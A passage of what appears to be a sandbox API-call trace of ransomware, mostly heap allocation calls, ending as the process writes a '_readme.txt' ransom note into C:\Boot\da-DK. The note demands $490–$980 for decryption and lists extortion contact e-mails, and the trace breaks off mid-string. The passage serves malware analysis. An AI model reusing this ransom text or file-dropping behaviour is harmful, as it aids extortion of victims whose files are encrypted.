Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0187.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.965] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0187.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.966] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0187.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.966] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.966] PathFindFileNameW (pszPath="") returned="" [0187.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.966] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0187.967] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0187.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0187.967] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0187.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0187.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.968] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0187.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e776e0 [0187.968] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0187.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.969] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0187.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0187.969] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like 